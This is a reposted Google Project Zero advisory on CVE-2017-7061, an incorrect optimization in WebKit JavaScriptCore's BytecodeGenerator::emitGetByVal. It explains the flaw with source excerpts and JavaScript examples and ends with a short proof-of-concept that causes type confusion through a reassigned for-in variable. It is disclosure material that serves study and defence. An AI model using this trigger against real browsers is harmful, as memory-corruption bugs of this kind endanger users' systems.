WebKit JSC BytecodeGenerator::emitGetByVal Incorrect Optimization
Source: Google Security Research    Author: lokihardt    Published: 2017-09-12
WebKit: JSC: Incorrect optimization in BytecodeGenerator::emitGetByVal

CVE-2017-7061


Let's start with JS code.

let o = {};
for (let i in {xx: 0}) {
    o[i]; // <<-------- (a)
}

When the code generator meets (a), it will call BytecodeGenerator::emitGetByVal.

Here's the code of BytecodeGenerator::emitGetByVal.

RegisterID* BytecodeGenerator::emitGetByVal(RegisterID* dst, RegisterID* base, RegisterID* property)
{
    for (size_t i = m_forInContextStack.size(); i > 0; i--) {
        ForInContext& context = m_forInContextStack[i - 1].get();
        if (context.local() != property)
            continue;

        if (!context.isValid())
            break;

        if (context.type() == ForInContext::IndexedForInContextType) {
            property = static_cast<IndexedForInContext&>(context).index();
            break;
        }

        ASSERT(context.type() == ForInContext::StructureForInContextType);
        StructureForInContext& structureContext = static_cast<StructureForInContext&>(context);
        UnlinkedValueProfile profile = emitProfiledOpcode(op_get_direct_pname);
        instructions().append(kill(dst));
        instructions().append(base->index());
        instructions().append(property->index());
        instructions().append(structureContext.index()->index());
        instructions().append(structureContext.enumerator()->index());
        instructions().append(profile);
        return dst;
    }

    UnlinkedArrayProfile arrayProfile = newArrayProfile();
    UnlinkedValueProfile profile = emitProfiledOpcode(op_get_by_val);
    instructions().append(kill(dst));
    instructions().append(base->index());
    instructions().append(property->index());
    instructions().append(arrayProfile);
    instructions().append(profile);
    return dst;
}

The method normally emits op_get_by_val to handle expressions like "o[i]". There is, however, a fast path that emits op_get_direct_pname when the index variable is the enumerated key of an enclosing for-in loop. op_get_direct_pname is designed for a string index only, so if a value of any other type reaches it as the index, the result is a type confusion. In the JS code above it is clear that "i" will semantically be the string "xx", so the generator uses op_get_direct_pname for (a).

Here's another example.

let o = {};
for (let i in {xx: 0}) {
    o[i]; // <<-------- (a)
    i = 0x123456; // <<-------- (b)
    o[i]; // <<-------- (c)
}

In this case, op_get_direct_pname is used at (a). At (b) the index variable "i" is reassigned, so the ForInContext object's invalidate method is called, which makes "context.isValid()" return false from that point on. As a result, op_get_by_val is used at (c).

The problem is that this invalidation happens at code-generation time, while the emitted bytecode runs many times. The following case therefore cannot be handled properly and causes a type confusion:

let o = {};
for (let i in {xx: 0}) {
    for (let j = 0; j < 2; j++) {
        o[i];  // When j == 1, op_get_direct_pname was already emitted, but i is not a string anymore.
        i = 0;
    }
}
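
The semantics the bytecode generator must preserve in that nested-loop pattern, written up as an added regression-style check (this is not code from the report; the function name and the property values in `o` are constructed for the example). On a correct engine the first inner iteration sees the enumerated string key and the second sees an ordinary computed access on the reassigned number:

```javascript
// Added example, not part of lokihardt's report. `o` is constructed so that
// the enumerated key ("xx", "yy") and the reassigned numeric index (0) map
// to distinguishable values, which lets the sequence of reads be checked.
function observeReassignedForInIndex() {
  const o = { xx: "from-xx", yy: "from-yy", 0: "from-0" };
  const seen = [];
  for (let i in { xx: 0, yy: 0 }) {
    for (let j = 0; j < 2; j++) {
      // j == 0: i is the enumerated string key, so the direct-pname fast path
      //         is valid here.
      // j == 1: i was reassigned to a number by the previous iteration, so
      //         this read must behave as a plain get_by_val on property "0".
      seen.push(typeof i + ":" + o[i]);
      i = 0;
    }
    // Each outer iteration gets a fresh `let i` bound to the next key.
  }
  return seen;
}
```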

PoC:
let o = {};
for (let i in {xx: 0}) {
    for (let j = 0; j < 2; j++) {
        o[i];
        i = new Uint32Array([0, 1, 0x777777, 0, 0]);
    }
}



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·tcprewrite 3.4.4 Buffer Overfl
·Jungo DriverWizard WinDriver 1
·MobaXtrem 10.4 Remote Code Exe
·Astaro Security Gateway 7 - Re
·Docker Daemon Unprotected TCP
·D-Link DIR8xx Routers - Leak C
·D-Link 850L XSS / Backdoor / C
·D-Link DIR8xx Routers - Root R
·Apache Struts 2 REST Plugin XS
·D-Link DIR8xx Routers - Local
·PlugX Controller Stack Overflo
·Netdecision 5.8.2 - Local Priv
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved